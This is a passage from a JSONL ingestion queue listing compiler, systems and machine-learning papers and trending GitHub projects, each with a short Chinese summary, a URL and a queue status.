推荐选项"},"url":"https://orm.drizzle.team/","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"devtool"} +{"slug":"rustbelt-2018","area":"papers","topic":"compilers-pl","title":"RustBelt: Securing the Foundations of the Rust Programming Language","meta":{"col3":"","col4":"Jung-Jourdan-Krebbers-Dreyer POPL'18;用 Iris 在 Coq 里证明 Rust 类型系统 + unsafe 模式安全性;理解 Rust 内存安全证明的奠基"},"url":"https://research.ralfj.de/thesis_phd/thesis-screen.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"rust"} +{"slug":"stacked-borrows-2019","area":"papers","topic":"compilers-pl","title":"Stacked Borrows: An Aliasing Model for Rust","meta":{"col3":"","col4":"Jung-Dang-Kang-Hur-Dreyer POPL'19;Rust 编译器 Miri 用的 alias 模型,理解 unsafe Rust 的 UB 边界"},"url":"https://plv.mpi-sws.org/rustbelt/stacked-borrows/paper.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"rust"} +{"slug":"racket-2018-tour","area":"papers","topic":"compilers-pl","title":"The Racket Manifesto","meta":{"col3":"","col4":"Felleisen-Findler-Flatt-Krishnamurthi-Barzilay-McCarthy-Tobin-Hochstadt SNAPL'15;Racket 设计哲学:programmable programming language;Lisp 系语言演化代表"},"url":"https://www.cs.utah.edu/plt/publications/snapl15-fffkbmt.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"lisp"} +{"slug":"george-appel-1996","area":"papers","topic":"compilers-pl","title":"Iterated Register Coalescing","meta":{"col3":"","col4":"George-Appel TOPLAS'96;把 register allocation 的 coalescing 与 simplify 交替到不动点,工业编译器的标准 RA 算法"},"url":"https://www.cs.princeton.edu/~appel/papers/coalesce.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"compilers"} +{"slug":"wilson-1992-gc-survey","area":"papers","topic":"compilers-pl","title":"Uniprocessor Garbage Collection Techniques","meta":{"col3":"","col4":"Wilson IWMM'92;GC 综述教科书级,串起 mark-sweep / copying / generational / incremental;理解 JVM/Go/V8 GC 设计图谱"},"url":"https://www.cs.cmu.edu/~fp/courses/15411-f09/misc/wilson92survey.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"compilers"} +{"slug":"self-1991-chambers","area":"papers","topic":"compilers-pl","title":"Customization: Optimizing Compiler Technology for SELF","meta":{"col3":"","col4":"Chambers-Ungar-Lee PLDI'91;SELF 动态语言 inline cache + type feedback;现代 V8/SpiderMonkey JIT 的源头"},"url":"https://www.cs.ucsb.edu/~ckrintz/racelab/gc/papers/chambers-pldi91.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"jit"} +{"slug":"dynamo-2000","area":"papers","topic":"compilers-pl","title":"Dynamo: A Transparent Dynamic Optimization System","meta":{"col3":"","col4":"Bala-Duesterwald-Banerjia PLDI'00;HP 的二进制级 JIT,trace-based optimization 思想源头,影响 PyPy/Java HotSpot"},"url":"https://dl.acm.org/doi/10.1145/349299.349303","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"jit"} +{"slug":"graal-truffle-2017","area":"papers","topic":"compilers-pl","title":"Practical Partial Evaluation for High-Performance Dynamic Language Runtimes","meta":{"col3":"","col4":"Würthinger-Wimmer-Stadler-Duboscq-Humer-Hofer-Mössenböck PLDI'17;Truffle/Graal 把 partial evaluation 工业化;GraalVM 的核心论文"},"url":"https://chrisseaton.com/truffleruby/pldi17-truffle/pldi17-truffle.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"jit"} +{"slug":"lattner-llvm-2004","area":"papers","topic":"compilers-pl","title":"LLVM: A Compilation Framework for Lifelong Program Analysis & Transformation","meta":{"col3":"","col4":"Lattner-Adve CGO'04;LLVM IR 设计奠基论文;理解所有现代编译器中段优化的统一框架"},"url":"https://www.aaronbradley.org/cs6235/llvm-cgo04.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"compilers"} +{"slug":"racket-macros-flatt-2016","area":"papers","topic":"compilers-pl","title":"Binding as Sets of Scopes","meta":{"col3":"","col4":"Flatt POPL'16;Racket 的 hygienic macro 算法重写;DSL/Lisp 元编程理论核心"},"url":"https://www.cs.utah.edu/plt/scope-sets/","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"metaprogramming"} +{"slug":"metaocaml-2003","area":"papers","topic":"compilers-pl","title":"MetaOCaml: A Compiled, Type-Safe, Multi-Stage Programming Language","meta":{"col3":"","col4":"Calcagno-Taha-Huang-Leroy;OCaml 上的多 stage 元编程;DSL 编译时生成代码的工业方案"},"url":"https://okmij.org/ftp/ML/MetaOCaml.html","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"metaprogramming"} +{"slug":"unlocking-the-working-memory-of-large-language-models-for-latent-reasoning-arxiv","area":"papers","topic":"ml-systems","title":"Unlocking the Working Memory of Large Language Models for Latent Reasoning","meta":{"col3":"2026","col4":"Aichberger-Hochreiter 2026 用 memory blocks 替代 autoregressive reasoning 单次 forward 完成 latent reasoning"},"url":"https://arxiv.org/abs/2605.30343","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"demystifying-data-organization-for-enhanced-llm-training-arxiv-2605-30334","area":"papers","topic":"machine-learning","title":"Demystifying Data Organization for Enhanced LLM Training","meta":{"col3":"2026","col4":"Microsoft 2026 STR/SAW 数据排序方法 + Boundary Sharpening/Cyclic Scheduling 等 4 准则"},"url":"https://arxiv.org/abs/2605.30334","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"soundnessbench-arxiv-2605-30329","area":"papers","topic":"machine-learning","title":"SoundnessBench: Can Your AI Scientist Really Tell Good Research Ideas from Bad Ones?","meta":{"col3":"2026","col4":"Furong Huang 2026 1099 ICLR 提案的 soundness 基准 frontier LLM 普遍 optimism bias"},"url":"https://arxiv.org/abs/2605.30329","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"how-lora-remembers-a-parametric-memory-law-for-llm-finetuning-arxiv-2605-30260","area":"papers","topic":"ml-systems","title":"How LoRA Remembers? A Parametric Memory Law for LLM Finetuning","meta":{"col3":"2026","col4":"ZJU 2026 LoRA 容量与序列长度的 power law MemFT 阈值优化策略"},"url":"https://arxiv.org/abs/2605.30260","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"same-evidence-different-answers-canonical-context-on-policy-distillation-arxiv-2","area":"papers","topic":"machine-learning","title":"Same Evidence Different Answers Canonical-Context On-Policy Distillation","meta":{"col3":"2026","col4":"CCOPD 2026 多轮对话中 self-anchored drift 现象 + canonical-context distillation 解法"},"url":"https://arxiv.org/abs/2605.30251","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"llmsurgeon-diagnosing-data-mixture-of-large-language-models-arxiv-2605-30348","area":"papers","topic":"machine-learning","title":"LLMSurgeon Diagnosing Data Mixture of Large Language Models","meta":{"col3":"2026","col4":"Zhiqiang Shen 2026 逆问题反推 LLM 预训练混合比例 Data Mixture Surgery"},"url":"https://arxiv.org/abs/2605.30348","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"loong-long-document-translation-agent-with-observe-and-act-arxiv-2605-30274","area":"papers","topic":"machine-learning","title":"Loong Long Document Translation Agent with Observe-and-Act","meta":{"col3":"2026","col4":"2026 3E 内存 Essence-Exemplar-Entity + RL 自我观察的长文档翻译 agent"},"url":"https://arxiv.org/abs/2605.30274","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"in-context-reward-adaptation-for-robust-preference-modeling-arxiv-2605-30323","area":"papers","topic":"ml-systems","title":"In-Context Reward Adaptation for Robust Preference Modeling","meta":{"col3":"2026","col4":"2026 transformer in-context 学习未见偏好域 human response time 作为辅助信号"},"url":"https://arxiv.org/abs/2605.30323","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"passnet-scaling-large-language-models-for-graph-compiler-pass-generation-arxiv-2","area":"papers","topic":"compilers-pl","title":"PassNet Scaling Large Language Models for Graph Compiler Pass Generation","meta":{"col3":"2026","col4":"2026 18K 图 + 200 任务的 LLM 编译器 pass 生成 benchmark TorchInductor 长尾 43% 慢 case"},"url":"https://arxiv.org/abs/2605.29357","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"e-path-equality-saturation-for-control-flow-graphs-arxiv-2605-28694","area":"papers","topic":"compilers-pl","title":"E-Path Equality Saturation for Control-Flow Graphs","meta":{"col3":"2026","col4":"2026 E-Path 数据结构把 equality saturation 扩展到 CFG 规避 phase-ordering 问题"},"url":"https://arxiv.org/abs/2605.28694","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"lacuna-safe-agents-as-recursive-program-holes-arxiv-2605-28617","area":"papers","topic":"compilers-pl","title":"LACUNA Safe Agents as Recursive Program Holes","meta":{"col3":"2026","col4":"Odersky 2026 agent 动作作为 typed program holes 编译时类型检查阻挡 prompt injection"},"url":"https://arxiv.org/abs/2605.28617","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"pacing-types-for-asynchronous-stream-equations-arxiv-2605-26635","area":"papers","topic":"compilers-pl","title":"Pacing Types for Asynchronous Stream Equations","meta":{"col3":"2026","col4":"RTLola 2026 运行时验证的 pacing 类型系统 Rocq 形式化证明 soundness"},"url":"https://arxiv.org/abs/2605.26635","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"a-formal-semantics-of-c-with-openmp-parallelism-arxiv-2605-26527","area":"papers","topic":"compilers-pl","title":"A Formal Semantics of C with OpenMP Parallelism","meta":{"col3":"2026","col4":"CompCert 2026 OpenMP C 形式语义 任何成功执行保证无 data race"},"url":"https://arxiv.org/abs/2605.26527","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"datesat-a-framework-for-solving-date-and-period-constraints-arxiv-2605-25180","area":"papers","topic":"compilers-pl","title":"DateSAT A Framework for Solving Date and Period Constraints","meta":{"col3":"2026","col4":"CMU 2026 首个支持日期/时间段约束的 SMT 框架 450 case 数据集 + Z3 后端"},"url":"https://arxiv.org/abs/2605.25180","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"agentic-proving-for-program-verification-arxiv-2605-23772","area":"papers","topic":"compilers-pl","title":"Agentic Proving for Program Verification","meta":{"col3":"2026","col4":"Bas Spitters 2026 Claude Code 在 CLEVER Lean 4 benchmark 上端到端 98.1 percent 成功"},"url":"https://arxiv.org/abs/2605.23772","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"milestone-multi-objective-compiler-phase-ordering-arxiv-2605-23435","area":"papers","topic":"compilers-pl","title":"MileStone Multi-Objective Compiler Phase Ordering","meta":{"col3":"2026","col4":"2026 GNN 预测 + RL 探索的 phase ordering 同能耗下执行时间降低 45 percent"},"url":"https://arxiv.org/abs/2605.23435","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"rtp-llm-high-performance-alibaba-llm-inference-engine-arxiv-2605-29639","area":"papers","topic":"ml-systems","title":"RTP-LLM High-Performance Alibaba LLM Inference Engine","meta":{"col3":"2026","col4":"Alibaba 2026 P-D Disaggregation + 分级 KV cache vs vLLM/SGLang 显著加速 + 1 亿用户验证"},"url":"https://arxiv.org/abs/2605.29639","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"iorm-hierarchical-i-o-governance-for-thousands-of-consolidated-databases-arxiv-2","area":"papers","topic":"operating-systems","title":"IORM Hierarchical I/O Governance for Thousands of Consolidated Databases","meta":{"col3":"2026","col4":"Oracle Exadata 2026 I/O Tagging + 分层 Resource Profile 多租户 IOPS QoS 工业实践"},"url":"https://arxiv.org/abs/2605.29006","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"bounded-priority-aware-locking-for-real-time-kernels-arxiv-2605-27620","area":"papers","topic":"operating-systems","title":"Bounded Priority-Aware Locking for Real-Time Kernels","meta":{"col3":"2026","col4":"BU 2026 Batched Priority Lock FIFO worst-case + 优先级 average wait 折中"},"url":"https://arxiv.org/abs/2605.27620","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"sandlock-confining-ai-agent-code-with-unprivileged-linux-primitives-arxiv-2605-2","area":"papers","topic":"security-privacy","title":"Sandlock Confining AI Agent Code with Unprivileged Linux Primitives","meta":{"col3":"2026","col4":"2026 非 root 进程沙箱 静态 policy 入 kernel + 监督进程兜底 专为 AI agent 不可信代码设计"},"url":"https://arxiv.org/abs/2605.26298","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"learnedcache-ebpf-integrated-perceptron-based-eviction-policy-arxiv-2605-26168","area":"papers","topic":"operating-systems","title":"LearnedCache eBPF-Integrated Perceptron-Based Eviction Policy","meta":{"col3":"2026","col4":"2026 Linux page cache 学习型驱逐策略 perceptron + eBPF + 实测 +10 percent insertion rate"},"url":"https://arxiv.org/abs/2605.26168","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"paracell-paravirtualized-secure-containers-arxiv-2605-20906","area":"papers","topic":"operating-systems","title":"ParaCell Paravirtualized Secure Containers","meta":{"col3":"2026","col4":"SJTU 2026 MPK XGate intra-container 隔离 + Pager 内存管理 vs RunV agent 工作负载 -88 percent 延迟"},"url":"https://arxiv.org/abs/2605.20906","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"clove-object-level-cxl-memory-management-in-managed-runtimes-arxiv-2605-20370","area":"papers","topic":"operating-systems","title":"Clove Object-Level CXL Memory Management in Managed Runtimes","meta":{"col3":"2026","col4":"Berkeley 2026 JVM 上的对象级 CXL 分层内存 profile-guided 热度跟踪 + 对象重定位"},"url":"https://arxiv.org/abs/2605.20370","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"sematune-semantic-aware-online-os-tuning-with-llms-arxiv-2605-15026","area":"papers","topic":"operating-systems","title":"SemaTune Semantic-Aware Online OS Tuning with LLMs","meta":{"col3":"2026","col4":"2026 LLM 语义引导的内核参数在线调优 41 参数 13 工作负载 +72.5 percent steady-state"},"url":"https://arxiv.org/abs/2605.15026","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"amp-arc-multi-proposer-protocol-with-bounded-inclusion-arxiv-2605-23677","area":"papers","topic":"distributed-systems","title":"AMP Arc Multi-Proposer Protocol with Bounded Inclusion","meta":{"col3":"2026","col4":"Tendermint 2026 多 proposer 区块链协议 解耦 dissemination 和 agreement bounded inclusion guarantee"},"url":"https://arxiv.org/abs/2605.23677","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"herring-parallel-batch-order-fairness-on-dag-based-blockchain-consensus-arxiv-26","area":"papers","topic":"distributed-systems","title":"Herring Parallel Batch-Order-Fairness on DAG-based Blockchain Consensus","meta":{"col3":"2026","col4":"2026 Narwhal/Tusk 上的并行 batch-OF vs FairDAG-RL +90 percent throughput MEV 防御"},"url":"https://arxiv.org/abs/2605.23648","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"multi-round-visibility-post-consensus-ordering-layer-for-dag-bft-arxiv-2605-2343","area":"papers","topic":"distributed-systems","title":"Multi-Round Visibility Post-Consensus Ordering Layer for DAG-BFT","meta":{"col3":"2026","col4":"2026 DAG BFT 的 post-consensus 结构化排序 committed DAG 作为证据基底"},"url":"https://arxiv.org/abs/2605.23432","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"inductive-deductive-synthesis-verified-distributed-systems-arxiv-2605-23109","area":"papers","topic":"distributed-systems","title":"Inductive Deductive Synthesis Verified Distributed Systems","meta":{"col3":"2026","col4":"Stoica/Lesani 2026 agent 协同合成实现+证明 分布式 KV store 7/7 vs SOTA agent 2/7"},"url":"https://arxiv.org/abs/2605.23109","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"monotone-erasure-codes-arxiv-2605-22426","area":"papers","topic":"distributed-systems","title":"Monotone Erasure Codes","meta":{"col3":"2026","col4":"2026 任意 monotone Boolean 公式上的 erasure code blockchain 通用化失效假设下的 AVID"},"url":"https://arxiv.org/abs/2605.22426","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"automating-low-risk-code-review-at-meta-radar-arxiv-2605-30208","area":"papers","topic":"business-engineering","title":"Automating Low-Risk Code Review at Meta RADAR","meta":{"col3":"2026","col4":"Meta 2026 535K diff 的风险分级自动化 review revert 1/3 Production Incident 1/50"},"url":"https://arxiv.org/abs/2605.30208","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"evorepair-vulnerability-repair-via-self-evolution-arxiv-2605-30105","area":"papers","topic":"security-privacy","title":"EvoRepair Vulnerability Repair via Self-Evolution","meta":{"col3":"2026","col4":"2026 experience-based 自进化 AVR agent PATCHEVAL 93.47 percent / SEC-bench 87 percent"},"url":"https://arxiv.org/abs/2605.30105","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"projectional-decoding-semantic-aware-llm-generation-arxiv-2605-30054","area":"papers","topic":"compilers-pl","title":"Projectional Decoding Semantic-Aware LLM Generation","meta":{"col3":"2026","col4":"2026 LLM 生成时同步维护 partial graph model 增量语义验证 + 确定性 SE 保证"},"url":"https://arxiv.org/abs/2605.30054","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"agora-autonomous-bug-detection-in-consensus-protocols-with-llm-agents-arxiv-2605","area":"papers","topic":"distributed-systems","title":"Agora Autonomous Bug Detection in Consensus Protocols with LLM Agents","meta":{"col3":"2026","col4":"2026 多 agent 协议 bug 检测 Raft/EPaxos/HotStuff/BullShark 共发现 15 个未知 logic bug"},"url":"https://arxiv.org/abs/2605.29910","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"trails-inferring-code-correctness-from-specification-arxiv-2605-29822","area":"papers","topic":"compilers-pl","title":"TRAILS Inferring Code Correctness from Specification","meta":{"col3":"2026","col4":"2026 具体 input-output 对锚定 LLM 推理 vs Zero-Shot CoT MCC +39 percent"},"url":"https://arxiv.org/abs/2605.29822","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"the-rise-of-the-software-defined-vehicle-architectures-survey-arxiv-2605-30001","area":"papers","topic":"embedded-iot","title":"The Rise of the Software-Defined Vehicle Architectures Survey","meta":{"col3":"2026","col4":"2026 SDV 综述 SOA/middleware/SDIoV/SDN+边缘+雾 电子电气架构演化分类法"},"url":"https://arxiv.org/abs/2605.30001","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} +{"slug":"codegraph","area":"projects","topic":"editors-ide","title":"colbymchenry/codegraph","meta":{"col3":"","col4":"TypeScript 35k star Pre-indexed code knowledge graph for Claude Code/AI tools"},"url":"https://github.com/colbymchenry/codegraph","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"agentmemory","area":"projects","topic":"ml-systems","title":"rohitg00/agentmemory","meta":{"col3":"","col4":"TypeScript 20k star 持久化记忆系统供 AI coding agent 使用"},"url":"https://github.com/rohitg00/agentmemory","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"understand-anything","area":"projects","topic":"editors-ide","title":"Lum1104/Understand-Anything","meta":{"col3":"","col4":"TypeScript 46k star 交互式代码探索的 knowledge graph"},"url":"https://github.com/Lum1104/Understand-Anything","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"vimax","area":"projects","topic":"machine-learning","title":"HKUDS/ViMax","meta":{"col3":"","col4":"Python 8k star Agentic 视频生成 director-producer 角色编排"},"url":"https://github.com/HKUDS/ViMax","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"skills","area":"projects","topic":"editors-ide","title":"mattpocock/skills","meta":{"col3":"","col4":"Shell 112k star 从个人工具积累的工程 skills 集合 Claude Code 周边"},"url":"https://github.com/mattpocock/skills","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"ai-engineering-from-scratch","area":"projects","topic":"ml-systems","title":"rohitg00/ai-engineering-from-scratch","meta":{"col3":"","col4":"Python 25k star AI 工程综合教育与项目框架"},"url":"https://github.com/rohitg00/ai-engineering-from-scratch","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"9router","area":"projects","topic":"ml-systems","title":"decolua/9router","meta":{"col3":"","col4":"JavaScript 15k star 多 LLM 提供商免费 AI coding 路由层"},"url":"https://github.com/decolua/9router","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"aitoearn","area":"projects","topic":"business-engineering","title":"yikart/AiToEarn","meta":{"col3":"","col4":"TypeScript 17k star AI 内容变现平台"},"url":"https://github.com/yikart/AiToEarn","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"ui-tars-desktop","area":"projects","topic":"ml-systems","title":"bytedance/UI-TARS-desktop","meta":{"col3":"","col4":"TypeScript 35k star ByteDance 多模态 agent stack 桌面端"},"url":"https://github.com/bytedance/UI-TARS-desktop","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"ruflo","area":"projects","topic":"ml-systems","title":"ruvnet/ruflo","meta":{"col3":"","col4":"TypeScript 56k star Claude 多 agent swarm orchestration"},"url":"https://github.com/ruvnet/ruflo","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"markitdown","area":"projects","topic":"data-science-ai","title":"microsoft/markitdown","meta":{"col3":"","col4":"Python 134k star Office 文档/任意文件转 Markdown 的 Python 工具"},"url":"https://github.com/microsoft/markitdown","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"scrapling","area":"projects","topic":"backend-api","title":"D4Vinci/Scrapling","meta":{"col3":"","col4":"Python 56k star 自适应 web 爬虫框架 单请求到全规模爬取"},"url":"https://github.com/D4Vinci/Scrapling","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"voxcpm","area":"projects","topic":"machine-learning","title":"OpenBMB/VoxCPM","meta":{"col3":"","col4":"Python 23k star 多语言 tokenizer-free TTS 系统"},"url":"https://github.com/OpenBMB/VoxCPM","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"compound-engineering-plugin","area":"projects","topic":"editors-ide","title":"EveryInc/compound-engineering-plugin","meta":{"col3":"","col4":"TypeScript 18k star Claude Code/Codex/Cursor 的 Compound Engineering plugin"},"url":"https://github.com/EveryInc/compound-engineering-plugin","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"train-llm-from-scratch","area":"projects","topic":"machine-learning","title":"FareedKhan-dev/train-llm-from-scratch","meta":{"col3":"","col4":"Jupyter 2k star 从下载数据到生成的 LLM 训练实战 guide"},"url":"https://github.com/FareedKhan-dev/train-llm-from-scratch","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"supermemory","area":"projects","topic":"ml-systems","title":"supermemoryai/supermemory","meta":{"col3":"","col4":"TypeScript 23k star 快速可扩展 memory engine + AI 时代 Memory API"},"url":"https://github.com/supermemoryai/supermemory","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"project-nomad","area":"projects","topic":"embedded-iot","title":"Crosstalk-Solutions/project-nomad","meta":{"col3":"","col4":"TypeScript 27k star 离线生存计算机 本地工具+知识+AI 整合"},"url":"https://github.com/Crosstalk-Solutions/project-nomad","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"pi-subagents","area":"projects","topic":"ml-systems","title":"nicobailon/pi-subagents","meta":{"col3":"","col4":"TypeScript 1.7k star Pi extension 异步 subagent delegation"},"url":"https://github.com/nicobailon/pi-subagents","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"developer-portfolios","area":"projects","topic":"editors-ide","title":"emmabostian/developer-portfolios","meta":{"col3":"","col4":"Python 23k star 开发者 portfolio 案例 curated 集合"},"url":"https://github.com/emmabostian/developer-portfolios","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"build-your-own-x","area":"projects","topic":"editors-ide","title":"codecrafters-io/build-your-own-x","meta":{"col3":"","col4":"Markdown 508k star 通过重写经典工具学习编程"},"url":"https://github.com/codecrafters-io/build-your-own-x","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"cloakbrowser","area":"projects","topic":"security-privacy","title":"CloakHQ/CloakBrowser","meta":{"col3":"","col4":"Python 22k star 通过 bot 